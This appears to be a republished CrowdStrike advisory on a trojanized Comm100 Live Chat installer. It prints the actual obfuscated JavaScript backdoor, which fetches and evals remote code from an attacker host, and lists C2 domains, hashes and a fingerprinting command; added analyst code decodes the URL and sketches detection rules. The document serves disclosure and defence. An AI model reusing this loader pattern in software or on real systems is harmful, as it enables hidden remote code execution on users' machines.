
Supply Chain Attack via a Trojanized Comm100 Chat Installer

Published 11/02/2022


Originally published by CrowdStrike.

  • Leveraging a combination of advanced machine learning and artificial intelligence, a new supply chain attack was identified during the installation of a chat-based customer engagement platform.
  • The supply chain attack involved a trojanized installer for the Comm100 Live Chat application being deployed.
  • Malware was delivered via a signed Comm100 installer that could be downloaded from the company’s website as recently as the morning of September 29, 2022.
  • With moderate confidence, the actor responsible for this activity likely has a China nexus.
  • Based on responsible disclosure, Comm100 has released an updated installer (10.0.9) that can be downloaded here.

Applying a combination of advanced machine learning (ML), artificial intelligence (AI) and deep analytics across the trillions of security events it captures, a leading security company identified a new supply chain attack pattern during the installation of a chat-based customer engagement platform.

The company confirmed that the supply chain attack involved a trojanized installer for the Comm100 Live Chat application. This attack occurred from at least September 27, 2022 through the morning of September 29, 2022. The trojanized file was identified at organizations in the industrial, healthcare, technology, manufacturing, insurance and telecommunications sectors in North America and Europe.

Attack Details

Malware is delivered via a signed Comm100 installer that was downloadable from the company’s website. The installer was signed on September 26, 2022 at 14:54:00 UTC using a valid Comm100 Network Corporation certificate.

The security company confirmed that the Microsoft Windows 7+ desktop agent hosted at https[:]//dash11.comm100[.]io/livechat/electron/10000/Comm100LiveChat-Setup-win.exe that was available until the morning of September 29 was a trojanized installer. Comm100 has since released an updated installer (10.0.9).

This installer (SHA256 hash: ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86) is an Electron application that contains a JavaScript (JS) backdoor within the file main.js of the embedded Asar archive.

(function(){if(!(typeof Buffer==="undefined")){require("http").get((function(){let b=Buffer.from('681c6818220d2243335a74157819630c620374077510600c6d143a59365b74187107620a6f03735c3f503c50355622','hex');
for(i=b.length-1;i>0;i--){b[i]=b[i]^b[i-1]}return b.toString();})(),function(resp){let data="";resp.on("data",chunk=>{data+=chunk;});resp.on("end",()=>{try{eval(data)}catch(e){}});resp.on("error",err=>{})}).on("error",err=>{})}})()

Figure 1. Initial JS Backdoor in main.js

The backdoor downloads and executes a second-stage script from URL http[:]//api.amazonawsreplay[.]com/livehelp/collect.
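The following Node.js snippet is an added analyst-side example, not code from the alert, Comm100 or CrowdStrike: it reverses the chained XOR from Figure 1 to recover that staging URL, shows the encoding direction as well, and pulls any such Buffer.from(..., 'hex') literal out of a main.js. The sample main.js fragment and the defang helper are constructed here.

```javascript
// Added example (not Comm100's or CrowdStrike's code): recover the staging URL hidden in the
// Figure 1 backdoor. The hex literal below is copied from the snippet shown in the alert.
const FIGURE1_HEX =
  '681c6818220d2243335a74157819630c620374077510600c6d143a59365b74187107620a6f03735c3f503c50355622';

// Parse a hex string into bytes; reject anything that is not clean, even-length hex.
function hexToBytes(hex) {
  if (hex.length % 2 !== 0 || /[^0-9a-fA-F]/.test(hex)) throw new Error('not a hex string');
  const out = [];
  for (let i = 0; i < hex.length; i += 2) out.push(parseInt(hex.slice(i, i + 2), 16));
  return out;
}

// Undo the backdoor's chained XOR. Its loop walks from the last byte down to index 1, so each
// byte is XORed with the still-unmodified byte before it: out[i] = in[i] ^ in[i-1], out[0] = in[0].
function decodeChainedXor(bytes) {
  const out = bytes.slice();
  for (let i = out.length - 1; i > 0; i--) out[i] ^= out[i - 1];
  return out;
}

// Inverse transform, to show how the literal was produced: keep the first byte, then XOR each
// plaintext byte with the previous *encoded* byte.
function encodeChainedXor(bytes) {
  const out = bytes.slice(0, 1);
  for (let i = 1; i < bytes.length; i++) out.push(bytes[i] ^ out[i - 1]);
  return out;
}

// Decode one literal to text; unprintable output means the literal was not a string.
function recoverString(hex) {
  return String.fromCharCode(...decodeChainedXor(hexToBytes(hex)));
}

// Bracket the scheme colon and the TLD dot so the recovered URL is safe to paste into a report.
function defang(url) {
  return url.replace(/^(\w+):\/\/([^/]+)/, (_, scheme, host) =>
    `${scheme}[:]//${host.replace(/\.(?=[^.]+$)/, '[.]')}`);
}

// Triage helper: find every Buffer.from('<hex>', 'hex') literal in a main.js and decode it.
function extractEncodedStrings(source) {
  const re = /Buffer\.from\(\s*'([0-9a-fA-F]+)'\s*,\s*'hex'\s*\)/g;
  return [...source.matchAll(re)].map((m) => recoverString(m[1]));
}

// Constructed stand-in for the relevant fragment of the trojanized main.js.
const SAMPLE_MAIN_JS = `require("http").get((function(){let b=Buffer.from('${FIGURE1_HEX}','hex');`;
```

Because the URL only exists after the XOR pass, a plain string search of the unpacked Asar archive would miss it; scanning for hex literals fed to Buffer.from is the more reliable triage step.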

The second-stage script consists of obfuscated JS containing a backdoor that gathers host information before providing the actor with remote shell functionality by spawning a new instance of cmd.exe.

The script also uses the command-and-control (C2) domain api.amazonawsreplay[.]com.

As part of likely follow-on activity, the actor installed additional malicious files on the affected host, including a malicious loader DLL named MidlrtMd.dll executed by a legitimate copy of a Microsoft Metadata Merge Utility (mdmerge.exe) binary via DLL search-order hijacking. The loader DLL decrypts a payload file named license using a customized variant of RC4 encryption with the hard-coded key U9ELetx8eMR8pd5koFamoOyuf9tTRTPG.

The decrypted payload consists of shellcode that is executed in memory and injects an embedded payload into a new instance of notepad.exe. The injected payload connects to the malicious C2 domain api.microsoftfileapis[.]com, which resolved to the IP address 8.219.167[.]156 at the time of the incident.
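The detection logic below is an added example, not from the alert or any vendor product. It flags the three observable behaviours just described (a renamed mdmerge.exe loading MidlrtMd.dll from a user-writable directory, notepad.exe making an outbound connection, and the ProductId registry query from Table 4) over constructed Sysmon-style events whose field names are simplified assumptions.

```javascript
// Added example: hypothetical detection rules for the follow-on activity in this alert,
// run over simplified Sysmon-style events (field names are assumptions, not a real schema).
const WRITABLE_DIRS = [/^c:\\programdata\\/i, /^c:\\users\\/i, /\\temp\\/i]; // heuristic list
const dirOf = (p) => p.slice(0, p.lastIndexOf('\\') + 1).toLowerCase();
const baseOf = (p) => p.slice(p.lastIndexOf('\\') + 1).toLowerCase();

// Rule 1: DLL search-order hijack. Match mdmerge.exe by its OriginalFileName (so the rename
// to CoreConnect.exe does not evade it) loading MidlrtMd.dll from its own directory, when that
// directory is user-writable rather than a Windows SDK install location.
function hijackedMdmerge(e) {
  return e.type === 'ImageLoad'
    && e.originalFileName.toLowerCase() === 'mdmerge.exe'
    && baseOf(e.imageLoaded) === 'midlrtmd.dll'
    && dirOf(e.imageLoaded) === dirOf(e.image)
    && WRITABLE_DIRS.some((re) => re.test(e.image));
}

// Rule 2: notepad.exe never needs a network socket; here it hosted the injected payload
// that beaconed to the C2 domain.
function notepadBeacon(e) {
  return e.type === 'NetworkConnect' && baseOf(e.image) === 'notepad.exe';
}

// Rule 3: the host-fingerprinting command the JS backdoor runs (Table 4), quoting-tolerant.
function productIdQuery(e) {
  return e.type === 'ProcessCreate'
    && /reg(\.exe)?\s+query\s+"?hklm\\software\\microsoft\\windows nt\\currentversion"?\s+\/v\s+productid/i.test(e.commandLine);
}

const RULES = [['dll_search_order_hijack_mdmerge', hijackedMdmerge],
  ['notepad_outbound_connection', notepadBeacon], ['js_backdoor_productid_query', productIdQuery]];
// Run every rule over every event and report the rule name with the offending image path.
function detect(events) {
  const hits = [];
  for (const e of events) for (const [rule, fn] of RULES) if (fn(e)) hits.push({ rule, image: e.image });
  return hits;
}

// Constructed sample telemetry: two benign events, then the three behaviours from the alert.
const SAMPLE_EVENTS = [
  { type: 'ImageLoad', image: 'C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\mdmerge.exe',
    imageLoaded: 'C:\\Program Files (x86)\\Windows Kits\\10\\bin\\x64\\MidlrtMd.dll', originalFileName: 'mdmerge.exe' },
  { type: 'NetworkConnect', image: 'C:\\Program Files\\Mozilla Firefox\\firefox.exe', destHost: 'example.com' },
  { type: 'ImageLoad', image: 'C:\\ProgramData\\Cisco Core\\CoreConnect.exe',
    imageLoaded: 'C:\\ProgramData\\Cisco Core\\MidlrtMd.dll', originalFileName: 'mdmerge.exe' },
  { type: 'NetworkConnect', image: 'C:\\Windows\\System32\\notepad.exe', destHost: 'api.microsoftfileapis.com' },
  { type: 'ProcessCreate', image: 'C:\\Windows\\System32\\reg.exe',
    commandLine: 'reg query "hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion" /v ProductId' },
];
```

Rule 1 is the durable one: it keys on the loader's behaviour rather than the hashes in Table 2, which the actor can change at will.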

Based on the company’s responsible disclosure, Comm100 has released an updated installer. Impacted Comm100 customers can download the latest exe version (10.0.9) here.

Comm100 further indicated it was performing a root cause analysis to obtain additional information.

Assessment

The payload delivered in this supply chain attack differs from payloads identified in previous incidents related to the same actor, targeting online gambling entities in Asia. Additionally, the recent activity differs from activity targeting online gambling in both the target scope and the supply chain attack mechanism delivering a trojanized app via Comm100’s website.

Despite these differences, the company assesses that the actor responsible for previously identified online gambling targeting is also likely responsible for these recent incidents. This assessment is made with moderate confidence based on the following factors:

  • The use of chat software to deliver malware
  • The use of the Microsoft Metadata Merge Utility binary to load a malicious DLL named MidlrtMd.dll
  • C2 domain-naming convention using Microsoft and Amazon-themed domains along with api. subdomains
  • C2 domains hosted on Alibaba infrastructure

Furthermore, with moderate confidence, this actor likely has a China nexus. This assessment is based on the presence of Chinese-language comments in the malware, aforementioned tactics, techniques and procedures (TTPs), and the connection to the targeting of online gambling entities in East and Southeast Asia — a previously established area of focus for China-nexus targeted intrusion actors.

Intelligence Confidence Assessment

High Confidence: Judgments are based on high-quality information from multiple sources. High confidence in the quality and quantity of source information supporting a judgment does not imply that that assessment is an absolute certainty or fact. The judgment still has a marginal probability of being inaccurate.

Moderate Confidence: Judgments are based on information that is credibly sourced and plausible, but not of sufficient quantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to express that judgments carry an increased probability of being incorrect until more information is available or corroborated.

Low Confidence: Judgments are made where the credibility of the source is uncertain, the information is too fragmented or too poorly corroborated to support solid analytic inferences, or the reliability of the source is untested. Further information is needed to corroborate the information or to fill known intelligence gaps.

Indicators

SHA256 Hash | Comm100 File Version
6f0fae95f5637710d1464b42ba49f9533443181262f78805d3ff13bea3b8fd45 (this file contains the same backdoor, but it has not been observed in the wild) | 10.0.72
ac5c0823d623a7999f0db345611084e0a494770c3d6dd5feeba4199deee82b86 | 10.0.8

Table 1. Trojanized Comm100 Application Executables

Filename | SHA256 Hash | Description
C:\ProgramData\Cisco Core\CoreConnect.exe | ac9f2ae9de5126691b9391c990f9d4f1c25afa912fbfda2d4abfe9f9057bdd8c | Legitimate mdmerge.exe executable
C:\ProgramData\Cisco Core\MidlrtMd.dll | 6194d57fc3bc35acf9365b764338adefacecfacf5955b87ad6a5b753fb6081f8 | Malicious loader DLL
C:\ProgramData\Cisco Core\license | c930a28878a5dd49f7c8856473ff452ddbdab8099acd6900047d9b3c6e88edca | Encrypted payload configured with C2 domain api.microsoftfileapis[.]com

Table 2. Observed Implant Likely Deployed by the Actor

Network Indicator | Description
http[:]//api.amazonawsreplay[.]com/collect_log | JS backdoor logging URL
http[:]//api.amazonawsreplay[.]com | JS backdoor C2
http[:]//api.amazonawsreplay[.]com/livehelp/init | JS backdoor C2
http[:]//api.microsoftfileapis[.]com | Encrypted payload C2 host
https[:]//selfhelp[.]windowstearns[.]com | Related encrypted payload C2 host
http[:]//api.amazonawsreplay[.]com/livehelp/collect | Staging URL for JS backdoor

Table 3. Network Indicators Related to Activity Described in this Alert

Command Line | Description
reg query \"hklm\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\" /v ProductId | Used in the JS backdoor to compute an MD5 victim hash

Table 4. Command-Line Indicators Related to Activity Described in this Alert
